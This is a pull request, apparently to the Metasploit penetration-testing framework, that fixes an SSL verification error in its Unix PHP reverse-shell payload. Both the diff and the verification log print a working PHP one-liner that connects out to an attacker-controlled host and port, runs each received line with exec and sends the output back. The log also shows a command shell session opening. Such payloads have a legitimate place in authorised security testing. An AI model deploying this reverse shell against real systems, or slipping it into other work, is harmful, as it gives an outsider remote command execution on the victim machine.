### PR TITLE
fix reverse_php_ssl

### DIFF
--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 253
+  CachedSize = 279
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -49,6 +49,6 @@ module MetasploitModule
     lhost = datastore['LHOST']
     ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
+    cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false,\"verify_peer_name\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
   end
 end


### PR DESCRIPTION
php verify peer name error.
ssl disconnected after verification error.

## Verification
```ruby
msf5 payload(cmd/unix/reverse_php_ssl) > generate -f raw
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false]]);while($s=@stream_socket_client("ssl://192.168.1.1:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
msf5 payload(cmd/unix/reverse_php_ssl) > [*] Command shell session 10 opened (192.168.1.1:4444 -> 192.168.1.1:56483) at 2020-01-14 17:43:45 +0800
[*] 192.168.1.1 - Command shell session 10 closed.
```
